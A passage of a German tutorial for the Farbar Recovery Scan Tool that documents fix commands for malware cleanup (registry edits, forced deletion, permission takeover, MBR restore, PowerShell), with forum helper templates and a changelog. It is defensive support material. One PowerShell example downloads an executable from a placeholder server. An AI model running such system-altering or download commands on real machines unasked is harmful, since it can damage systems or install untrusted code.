Wichtiger Hinweis: Der Zielpfad sollte den Dateinamen enthalten, selbst wenn es zu dem Zeitpunkt keine Datei mit diesem Namen in dem Ordner gibt.



Powershell:
Um Powershell-Befehle auszuführen:

1. Um einen einzelnen, unabhängigen Befehl mit Powershell auszuführen, dessen Ergebnis dann in der fixlog.txt angezeigt wird, muss man die folgenden Syntax verwenden

Zitat:

Powershell: Befehl

Beispiel:

Zitat:

Powershell: Get-Service

2. Um einen einzelnen, unabhängigen Befehl mit Powershell auszuführen und dessen Informationen in ein Log zu schreiben (nicht in die fixlog.txt): (redirection oder Out-File cmdiet)

Zitat:

Powershell: Befehl > "Pfad zu einer Textdatei"
Powershell: Befehl | Ziel-Datei "Pfad zu einer Textdatei"

Beispiel:

Zitat:

Powershell: Get-Service > C:\log.txt
Powershell: Get-Process >> C:\log.txt

3. Um ein Powershell script (.ps1) mit einem oder mehreren Befehlen/Zeilen auszuführen:

Zitat:

Powershell: "Pfad zu einer Skriptdatei"

Beispiel:

Zitat:

Powershell: C:\Users\UserName\Desktop\script.ps1
Powershell: "C:\Users\User Name\Desktop\script.ps1"

4. Um mehrere PowerShell Befehle/Zeilen in einem Script ausführen zu können (so wie sie in einer Skriptdatei (.ps1) vorhanden sind; aber ohne eine .ps1 Datei zu erzeugen), muss ein Strichpunkt ; anstatt einer neuen Zeile verwendet werden, um die einzelnen Befehle/Zeilen zu trennen:

Zitat:

Powershell: Zeile 1; Zeile 2; (und so weiter)

Beispiel:

Zitat:

Powershell: $WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://server/file.exe", "C:\Users\User\Desktop\file.exe")

Alternativ können die StartPowershell: — EndPowershell: Befehle benutzt werden. (Siehe unten)



Reboot:
Erzwingt einen Neustart. Es ist irrelevant wo die Zeile in der Fixlist steht, der Neustart wird erzwungen, nachdem alle anderen Befehle des Fixes ausgeführt wurden.

Wichtiger Hinweis: Dieser Befehl funktioniert nicht in der Recovery Environment.



Reg:
Befehl, um die Registry zu bearbeiten, nutzt Reg.exe.
Die Syntax ist:

Zitat:

Reg: reg Befehl

Beispiel:

Zitat:

Reg: reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v Start /t REG_DWORD /d 0x2 /f
Reg: reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" C:\Users\User\Desktop\backup.reg

Wichtiger Hinweis: Anders als bei den FRST-Befehlen muss man hier die korrekte Syntax für reg.exe benutzen. Das heißt beispielsweise, dass Pfade mit Leerzeichen mit Anführungszeichen umschlossen werden müssen.
Wichtiger Hinweis: Dieser Befehl kann keine ungültigen oder gesperrten Schlüssel/Werte entfernen. Siehe dazu die Beschreibung DeleteKey: und DeleteValue: weiter oben in der Anleitung.



RemoveDirectory:
Dieser Befehl ist zum Löschen (es wird nicht in die Quarantäne verschoben) von Ordnern und Dateien, die entweder nicht erlaubte Zeichen im Pfad haben oder deren Rechte manipuliert wurden, sodass ein einfaches Entfernen nicht möglich ist. Es ist nicht nötig, den Befehl Unlock: zu verwenden. Man sollte diesen Befehl nur benutzen, wenn der normale Befehl fehlgeschlagen ist. Der Befehl ist am Mächtigsten in der Recovery Environment.
Beispiel:

Zitat:

RemoveDirectory: Pfad

RemoveProxy:
Entfernt bestimmte Internet Explorer Einstellungen, etwa "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" und "ProxySettingsPerUser" in "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings". Es entfernt auch "ProxyEnable" (Falls es auf 1 gesetzt ist), "ProxyServer", "AutoConfigURL", "DefaultConnectionSettings" und "SavedLegacySettings" Werte in HKLM und HKU\SID. Es führt zudem den BITSAdmin Befehl mit NO_PROXY aus.

Des weiteren wird auch der Wert Default in "HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies" zurückgesetzt sofern dieser verändert wurde.

Wichtiger Hinweis: Dienste und Programme die diesen Wert verändern sollten vor dem Fixen entfernt werden, sonst setzen sie den Proxy erneut.



Replace:
Um Dateien zu ersetzen, nutzt man folgendes Skript:

Zitat:

Replace: Ursprung Ziel

Beispiel:

Zitat:

Replace: C:\WINDOWS\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_cf8ff0d2c0eeb431\dnsapi.dll C:\WINDOWS\system32\dnsapi.dll
Replace: C:\WINDOWS\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.14393.206_none_d9e49b24f54f762c\dnsapi.dll C:\WINDOWS\SysWOW64\dnsapi.dll

FRST.exe verschiebt die Zieldatei (falls vorhanden) in die Quarantäne und kopiert die Ursprungsdatei an die Stelle der Zieledatei.
Die Ursprungsdatei bleibt erhalten und wird nicht verschoben. Im Beispiel bleibt also die dnsapi.dll im WinSxS Unterordner erhalten.

Wichtiger Hinweis: Der Zielpfad sollte den Dateinamen enthalten, selbst wenn es zu dem Zeitpunkt keine Datei mit diesem Namen in dem Ordner gibt.
Wichtiger Hinweis: Der Zielordner muss existieren, sonst wird die Datei nicht ersetzt. Der Befehl Copy: könnte stattdessen verwendet werden.



RestoreFromBackup:
Beim ersten Ausführen von FRST.exe wird ein Backup der Registry unter %SystemDrive%\FRST\Hives (normalerweise C:\FRST\Hives) erstellt. Es wird beim nächsten Ausführen des Programms nicht überschrieben werden, sofern das Backup nicht älter als 2 Monate ist. Wenn etwas schief geht, kann man also dieses Backup wiederherstellen, um den Ursprungszustand wiederherzustellen. Die Syntax ist:

Zitat:

RestoreFromBackup: NamedesHauptschlüssels

Beispiele:

Zitat:

RestoreFromBackup: software
RestoreFromBackup: system

RestoreMBR:
Um den MBR wiederherzustellen, nutzt FRST die MbrFix.exe, die sich im selben Ordner wie FRST.exe befindet. Daher benötigt man zum Wiederherstellen des MBR, MbrFix/MBrFix64 und die MBR.bin, die das Backup des MBR enthält, und das folgende Skript:

Zitat:

RestoreMbr: Drive=#

Beispiel:

Zitat:

RestoreMbr: Drive=0

Wichtiger Hinweis: Der MBR, den man wiederherstellen will, sollte MBR.bin heißen.



RestoreQuarantine:
Man kann entweder die komplette Quarantäne oder einzelne Dateien/Ordner wiederherstellen.
Um die gesamte Quarantäne wiederherzustellen nutzt man:

Zitat:

RestoreQuarantine:

Oder:

Zitat:

RestoreQuarantine: C:\FRST\Quarantine

Um eine Datei oder einen Ordner wiederherzustellen benutzt man folgenden Befehl:

Zitat:

RestoreQuarantine: PfadzurQuarantäne

Beispiele:

Zitat:

RestoreQuarantine: C:\FRST\Quarantine\C\Program Files\Microsoft Office
RestoreQuarantine: C:\FRST\Quarantine\C\Users\user\Desktop\ANOTB.exe.xBAD

Um den genauen Pfad in der Quarantäne zu finden kann folgender Befehl benutzt werden:

Zitat:

Folder: C:\FRST\Quarantine

Oder:

Zitat:

CMD: dir /a/b/s C:\FRST\Quarantine

Wichtiger Hinweis: Sollte die wieder erstellte Datei außerhalb der Quarantäne bereits existieren, so überschreibt FRST diese nicht. Die Datei bleibt dann in der Quarantäne. Muss eine Datei überschreiben werden, so sollte zuerst die existierende Datei umbenannt werden, bevor die wiederherzustellende Datei zurück kopiert werden kann.




SaveMbr:
Siehe auch die Rubrik Laufwerke und MBR & Partitionstabelle in dieser Anleitung.

Um eine Kopie des MBRs zu erstellen, nutzt man folgende Syntax:

Zitat:

SaveMbr: Drive=#

Beispiel:

Zitat:

SaveMbr: Drive=0

Wichtiger Hinweis: Es wird eine MBRDUMP.txt erstellt. Wenn man diese einsehen will, sollte man den User bitten, diese anzuhängen, da es sich um eine binäre Datei handelt.



SetDefaultFilePermissions:
Dieser Befehl ist für gesperrte Systemdateien/-ordner. Der Befehl setzt die Gruppe der "Administratoren" als Besitzer einer Datei ein und gewährt - in Abhänigkeit des vorhandenen Systems - Zugriffsrechte für die Standardgruppen.

Wichtiger Hinweis: Der Trusted-Installer wird nicht als Besitzer eingetragen. Man kann den Befehl aber zur Not auch auf Systemdateien/-ordner anwenden, die von Malware blockiert werden.

Beispiel:

Zitat:

SetDefaultFilePermissions: Pfad

StartBatch: — EndBatch:
Um eine Batchdatei zu erstellen und auszuführen.
Syntax ist:

Zitat:

StartBatch:
Zeile 1
Zeile 2
usw.
EndBatch:

Die Ausgabe wird in die fixlog.txt gedruckt.



StartPowershell: — EndPowershell:
Alternative, um ein mehrzeiliges Powershellskript auszuführen (siehe auch den Befehl Powershell: weiter oben).
Syntax:

Zitat:

StartPowershell:
Zeile 1
Zeile 2
usw.
EndPowershell:

Die Ausgabe wird in die fixlog.txt gedruckt.



StartRegedit: — EndRegedit:
Um eine Registry-Datei zu importieren. (.reg)
Die Syntax ist:

Zitat:

StartRegedit:
.reg Datei Format
EndRegedit:

Der Windows Registry Editor Version 5.00 header ist optional, aber REGEDIT4 header muss eingefügt werden, wenn benötigt.

Beispiel:

Zitat:

StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MpsSvc]
"Start"=dword:00000002
EndRegedit:

Im Fixlog befindet sich folgende Bestätigung, dass das Skript ausgeführt wurde:

Zitat:

Registry ====> Der Vorgang wurde erfolgreich beendet.

Wichtiger Hinweis: Die Zeile mit der Bestätigung erscheint ungeachtet irgendwelcher eventueller Fehler in der .reg Datei.

Wichtiger Hinweis: Dieser Befehl kann keine ungültigen oder gesperrten Schlüssel/Werte entfernen. Siehe dazu die Beschreibung DeleteKey: und DeleteValue: weiter oben in der Anleitung.



Symlink:
Um symbolische Links oder Knoten in einem Ordner aufzulisten.

Die Syntax sieht so aus:

Zitat:

Symlink: path

Beispiel:

Zitat:

Symlink: C:\Windows

Wichtiger Hinweis: Der Befehl funktioniert rekursiv. Daher kann der Scan je nach Standort sehr viel Zeit in Anspruch nehmen.



SystemRestore:
Zum Aktivieren oder Deaktivieren der Systemwiederherstellung.
Die Syntax lautet:

Zitat:

SystemRestore: On

Zitat:

SystemRestore: Off

Falls der On Schalter genutzt wird, überprüft FRST ob es ausreichend freien Speicherplatz gibt, um die Systemwiederherstellung zu aktivieren. Wenn die Anforderung nicht erfüllt wird, wird ein Fehler ausgegeben.



TaskDetails:
Listet erweiterte Informationen über einen Task in Bezug auf die Ausführungszeit.

Beispiel:

Zitat:

========================= TasksDetails: ========================

UCBrowserUpdater (LastRunTime: NA -> NextRunTime: 2016-10-13 11:32:00 -> Status: Ready -> Schedule Type: Undefined)

Wichtiger Hinweis: Der Befehl wird nicht unter Windows XP unterstützt und funktioniert nur im normalen Modus.



testsigning on:
Wichtiger Hinweis: Für Windows Vista und neuer, wird nicht bei Laufwerken unterstützt, die Secure Boot aktiviert haben.

Aktiviertes testsigning ist eine nicht-standard BCD Modifikation, die von Malware oder von Benutzern, die versuchen, nicht unterstützte Treiber zu installieren, eingerichtet werden könnte.
Wenn FRST Hinweise auf Veränderungen findet, dann werden diese wie folgt aufgeführt:

Zitat:

testsigning: ==> 'testsigning' ist aktiviert. Prüfung auf eventuelle nicht-signierte Treiber durchführen <===== ACHTUNG

Man sollte eine Überprüfung der Treiber Sektion durchführen, um einen Treiber zu finden, der zur Warnung passt. Je nach Situation sollte man den Treiber zusammen mit der Warnung oder die Warnung alleine in die fixlist mit aufnehmen.

Sollte es nach der Bereinigung der Einträge zu unerwünschten Nebenwirkungen kommen, kann man den Befehl benutzen, um das testsigning für weitere Problembehandlungen wieder zu aktivieren.



Unlock:
Wird der Befehl auf eine Datei oder einen Ordner angewendet, so wird der Besitzer auf "Administrators" (EN) / "Administratoren" (DE) gesetzt und Zugriffsrechte für "Administrators" (EN) / "Administratoren" (DE), "USERS" und "SYSTEM" gesetzt. Dieser Befehl sollte nur für bösartige Ordner/Dateien benutzt werden. Um Systemdateien zu entsperren soll man den Befehl SetDefaultFilePermissions: verwenden.

Im Falle von Registryschlüssel wird der Besitzer ebenfalls auf "Administrators" (EN) / "Administratoren" (DE) zurückgesetzt und verschiedenen Gruppen wird Zugriff auf den Schlüssel gewährt. Der Befehl ist in diesem Fall nicht rekursiv und kann sowohl für gutartige als auch bösartige Einträge genutzt werden.

Der Fix sollte wie folgt aussehen:

Zitat:

Unlock: Pfad

Wichtiger Hinweis: Um ein Element zu entfernen, muss man es vor dem Entfernen nicht entsperren:
- Für Dateien/Ordner gibt man einfach den Pfad in die fixlist ein und FRST setzt die Berechtigungen zurück und verschiebt die Objekte in die Quarantine. Um einen Ordner dauerhaft zu entfernen, verwendet man den Befehl RemoveDirectory:
- Für Registrierungsschlüssel verwendet man den Befehl DeleteKey:



Virusscan:
Um Dateien mit Jotti zu überprüfen. FRST sucht in der Jotti-Datenbank nach früheren Analysen. Eine Datei, die noch nie an Jotti übermittelt wurde, wird zur Analyse hochgeladen.
Es können mehrere Dateien, getrennt durch Strichpunkte, eingefügt werden.

Zitat:

Virusscan: path;path

Zip:
Um Dateien/Ordner zu zippen (wenn man sie, zum Beispiel, anschließend hochladen lassen will). Die Zip-Datei wird auf dem Desktop erstellt und heißt Datum_Zeit.zip, man muss sie manuell zur Website seiner Wahl hochladen lassen. Für Dateien/Ordner mit doppelten Namen wird mehr als ein Archiv erzeugt.

Zitat:

Zip: Pfad;Pfad

Es können beliebig viele Dateien/Ordner gezipt werden, solange sie mit einem Strichpunkt getrennt werden.

Beispiel:

Zitat:

Zip: C:\malware.exe;C:\Windows\Minidump;C:\Windows\Logs\CBS\CBS.log

Bausteine

Die folgenden Bausteine sind Beispielbausteine für die Verwendung von FRST.



FRST Suchlauf im normalen Modus:
Bitte lade dir die passende Version von Farbar Recovery Scan Tool auf deinen Desktop: FRST 32-Bit | FRST 64-Bit

• Starte FRST.
• Solltest du die Meldung "Der Computer wurde durch Windows geschützt" erhalten, klicke auf Weitere Informationen und dann auf Trotzdem ausführen.
• Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
• Die Logdateien werden nun erstellt und befinden sich danach im selben Verzeichnis wie FRST.
• Poste mir die FRST.txt und die Addition.txt in deinem Thema.

FRST Suchlauf - Kontrolle:

• Starte FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
• FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
• Poste mir beide Logdateien mit deiner nächsten Antwort.

FRST Suchlauf in der Wiederherstellungsumgebung:
Anleitung: Farbar Recovery Scan Tool (FRST) in der Wiederherstellungsumgebung






Entfernungen im normalen oder abgesicherten Modus

• Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
• Kopiere den gesamten Inhalt der folgenden Code-Box:
  
  Code: Alles auswählenAufklappen

  ATTFilter

  Start::
  < Code >
  End::
           

• Starte nun FRST und klicke direkt den Reparieren Button.
  Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
• Gegebenenfalls muss dein Rechner neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Aktualisierungen des Tutorials:



02/08/2024
+ Beschreibung der Netzwerkverbindung aktualisiert


29/03/2024
+ Hinweise unter "Restore Points (Wiederherstellungspunkte)" und "CreateRestorePoint:" aktualisiert


13/03/2024
+ Befehl Virusscan: hinzugefügt
+ Ausgabe des Befehls File: aktualisiert


28/02/2024
+ Alle VirusTotal-Referenzen entfernt (nicht mehr unterstützt)
+ Erklärung zu "Chrome Apps" unter "Installed Programs" ("Installierte Programme") hinzugefügt


========================================================================


12/12/2023
+ Umleitung der Startup Ordner unter Registry hinzugefügt
+ Unlock: Beschreibung korrigiert und abgespeckt
+ Hinweis zur Pfadbeschädigung aktualisiert

03/09/2023
+ Konsolenbild aktualisiert, um „Geplante Aufgaben“ unter „Whitelist“ anzuzeigen
+ Ziel-FRST-ausführbare Datei im Header hinzugefügt
+ Symlink: Befehl hinzugefügt
+ DNS-Cache zu EmptyTemp: hinzugefügt
+ Diverse Links korrigiert


========================================================================


07/10/2022
+ Zeitlimit für Powershell: Befehl hinzugefügt
+ WinHTTP AutoProxy-Cache zu EmptyTemp: Befehl hinzugefügt:

26/06/2022
+ Festplattenmodell für Festplatten hinzugefügt
+ EmptyEventLogs: Befehl hinzugefügt
+ EmptyTemp: aktualisiert (Flash-Cache entfernt, Discord-Cache hinzugefügt)
+ FilesInDirectory: und Folder: aktualisiert, um die Prüfung digitaler Signaturen einzuschließen
+ Bereinigung nicht notwendiger Beispiele

28/03/2022
+ Prozessbeschreibung aktualisiert, um die (Elternprozess ->) Erklärung aufzunehmen

23/03/2022
+ Behebung des Zeitlimits auf CMD: Befehl reduziert

06/02/2022
+ Comment: Befehl hinzugefügt


========================================================================


12/11/2021
+ Portugiesische Übersetzung hinzugefügt
+ Windows 11 zu den unterstützten Betriebssystemen hinzugefügt
+ BITS-Scan unter Andere Bereiche hinzugefügt
+ Kleine Anpassungen im Hauptheader
+ Diverse Links korrigiert

23/09/2021
+ EmptyTemp: aktualisiert um qmgr.db

04/07/2021
+ Kontobeschreibung aktualisiert

17/02/2021
+ Beschreibung "Geladene Profile" aktualisiert

24/01/2021
+ Brave, Vivaldi und Yandex Browser zu Scan/Fix und EmptyTemp: hinzugefügt

14/01/2021
+ Russische Übersetzung aktualisiert


========================================================================


22/11/2020
+ Das Konsolenbild wurde aktualisiert und zeigt eine neue Option "Ein Monat", die unter Ausnahmen hinzugefügt wurde
+ Whitelisting-Beschreibungen wurden in verschiedenen Abschnitten aktualisiert oder entfernt
+ Hinweis zur Überprüfung der digitalen Signaturen unter "Ein Monat" aktualisiert
+ Verschiedene kleinere Änderungen

15/10/2020
+ Edge wurde zur Erkennung von Registry.pol hinzugefügt

13/09/2020
+ "Internet Explorer" und "Internet Explorer rusted/restriced" Suchläufe in Addition.txt zusammengefasst
+ Die Internet Explorer-Version wurde vom Header FRST.txt in den Abschnittstitel "Internet Explorer" verschoben

16/05/2020
+ Verweise auf "Verfügbare Profile" wurden aus der Beschreibung des FRST.txt-Headers entfernt.
+ Die Prozessbeschreibung wurde aktualisiert und enthält nun die Erklärung <Nummer>
+ Verschiedene kleinere Änderungen

25/01/2020
+ Edge Beschreibung ersetzt, um Chromium-basierten Edge abzudecken
+ Hinweis zu den offiziellen Erweiterungs-Repositories aktualisiert, um Microsoft Edge Addons hinzuzufügen
+ Die Chrome-Beschreibung wurde geändert, um anzuzeigen, dass Einstellungen jetzt in allen Profilen erkannt werden
+ Network Binding scan unter Andere Bereiche hinzugefügt
+ Russische Übersetzung als veraltet markiert



========================================================================


08/11/2019
+ Spanische Übersetzung hinzugefügt
+ Firefox-, Chrome- und Opera-Beschreibungen aktualisiert
+ OPR Extension werden nicht mehr in einem Fix verarbeitet
+ Beschreibung der installierten Pakete aktualisiert, um die Erkennung von [Startup Task] einzuschließen
+ EmptyTemp: Beschreibung aktualisiert, um den Firefox-Verlauf abzudecken

20/10/2019
+ Codecs-Abschnitt in Addition.txt hinzugefügt

25/08/2019
+ "AllUserName" Ersetzung hinzugefügt

31/07/2019
+ Alle Instanzen von Restore From Backup: geändert in RestoreFromBackup:
+ RestoreErunt: Befehl entfernt
+ SystemRestore: Befehl hinzugefügt
+ Restore Points (Wiederherstellungspunkte) Beschreibungen aktualisiert

20/06/2019
+ StartRegedit: - EndRegedit: Ausgabe aktualisiert

10/06/2019
+ FLock Suchlauf hinzugefügt
+ Beschreibung der gesperrten Treiber unter SigCheck entfernt

07/06/2019
+ Erklärung zu werbefinanzierten Paketen hinzugefügt. Versteckte Programmbeschreibung vereinfacht.
+ SigCheckExt-Scan hinzugefügt
+ Treiber MD5 Scan entfernt
+ Befehl VerifySignature: entfernt
+ Anmerkung hinzugefügt zu File: und VirusTotal: Beschreibungen, die mehr als 4 Dateien adressieren
+ Winmgmt automatische Korrektur entfernt
+ NetSvcs-Informationen zu digitalen Signaturen wurden korrigiert
+ Gruppenrichtlinienbeschreibungen aus den Abschnitten von Firefox und Chrome entfernt

13/05/2019
+ Beschreibung der installierten Programme aktualisiert, um Windows 10/8-Pakete abzudecken

27/04/2019
+ Systemhersteller und -modell wurden in die FRST Kopfzeile hinzugefügt
+ BIOS und Motherboard unter "Speicherinformationen" in "Addition.txt" hinzugefügt
+ Die Beschreibungen für Whitelisting, Standard-Scan-Bereiche, Dienste / Treiber und geladene Module wurden aktualisiert, um eine erweiterte Signaturüberprüfung anzuzeigen
+ "FCheck" Abschnitt hinzugefügt. "Dateien zum Verschieben oder Löschen", "Einige Dateien / Ordner mit einer Größe von null Byte" und "Einige Inhalte in TEMP" wurden entfernt.
+ Bamital & volsnap wurde in "SigCheck" umbenannt. Dazugehörige Beschreibung angepasst.
+ Geplante Aufgaben wurden in FRST.txt verschoben (einschließlich RE-Unterstützung)
+ Benutzerdefinierte CLSID-Beschreibung wurde aktualisiert, um Scans aufzunehmen, die aus FRST.txt verschoben wurden
+ Beschreibung einer Deaktivierten Systemwiederherstellung aus der Registrierung zugunsten einer einzelnen Notiz unter Addition.txt entfernt
+ Unterschied zwischen den in FRST.txt und Addition.txt aufgelisteten DNS-Servern verdeutlicht
+ Hinweis zu einer Erweiterungs-Update-URL hinzugefügt
+ Viele Beispiele wurden aktualisiert oder ersetzt
+ Diverse kleinere Änderungen

18/01/2019
+ Internet Explorer Version vom FRST.txt Kopfbereich unter Windows 8 und neuer entfernt

13/01/2019
+ Registry Beschreibung aktualisiert und vereinfacht
+ Host content Beschreibung aktualisiert (hosts.ics)
+ PATh Variable unter Other Areas (Andere Bereiche) hinzugefügt
+ Einige FRST.txt Sektionen vereinfacht


========================================================================


10/12/2018
+ Niederländische Übersetzung hinzufügt
+ UTF-8 Codierungstyp für manuell erstellte fixlist.txt ausgewählt
+ Erklärungen für ACHTUNG Warnungen in Bezug auf automatische Entriegelungen unter Services (Dienste) und Scheduled Tasks (Geplante Aufgaben) hinzugefügt
+ WMI Beschreibung ersetzt
+ Telephony Service Providers (TSP) Suchlauf unter Other Areas (Andere Bereiche) hinzugefügt

17/05/2018
+ Firefox Richtlinien Suchlauf hinzugefügt
+ Erklärung der installierten Programme verdeutlicht

03/05/2018
+ Beschreibung zur FRST-Deinstallation hinzugefügt

11/03/2018
+ Spendeninformationen entfernt

25/02/2018
+ Befehl "nointegritychecks on:" entfernt (wird nicht länger unterstützt)
+ Beschreibung zum Befehl "testsigning on:" vereinfacht
+ Beschreibung zur Verarbeitung von symbolischen Links ersetzt (Rubrik "One Month Created Files and Folders")
+ Hinweise zu ZeroAccess von den Rubriken Winsock, NetSvcs und One Month entfernt
+ Erkennung "Chrome dev build detected!" entfernt
+ Alte Beispiele von der Firefox und Chrome Beschreibung entfernt
+ Beschreibung zu SmartScreen korrigiert um Windows 10 Version 1703 und neuere Systeme zu berücksichtigen
+ Verschiedene kleinere Änderungen

20/02/2018
+ Erkennungen für TDL4 Rootkit in den Bereichen Bamital & volsnap und Laufwerke entfernt

18/02/2018
+ Befehl "Copy:" hinzugefügt
+ Windows Defender EventLog hinzugefügt
+ Beschreibung "Laufwerke und MBR & Partitionstabelle" aktualisiert (Unterstützung nicht gemounteter Laufwerke und UEFI\GPT-basierte Schemen)

17/01/2018
+ Erkennung von gesperrten Treibern vereinfacht (Bamital & volsnap)


=========================================================================


27/11/2017
+ Beschreibung für "Vorbereiten der Scripte" aktualisiert

24/10/2017
+ Beschreibung für "CurrentUserName"-Ersatz unter Einleitung hinzugefügt

21/10/2017
+ Header von FRST.txt und Addition.txt aktualisiert (Edition von Windows, größere Updates, Version und OS Build)

10/10/2017
+ Befehle "FindFolder:" und "SearchAll:" zur "Datei-Suche" hinzugefügt
+ Befehl "FindFolder:" überarbeitet
+ Bereich "Weitere optionale Suchläufe" überarbeitet und aktualisiert

05/10/2017
+ Einleitung aktualisiert
+ Bamital & volsnap Beschreibung erweitert
+ Neuer Befehl "FilesInDirectory:" hinzugefügt
+ Befehle "File:" und "Folder:" aktualisiert

19/08/2017
+ Tutorial Informationen aktualisiert
+ Neuer Befehl "VirusTotal:" hinzugefügt
+ Beschreibung der Befehle "File:" und "Folder:" verbessert
+ Beschreibung der Accounts (Konten) verbessert

08/07/2017
+ CHR Extension werden nicht mehr bearbeitet

04/07/2017
+ FRST-Anleitung komplett von M-K-D-B überarbeitet
+ die deutsche Version wird wieder in der offiziellen Liste der Tutorials geführt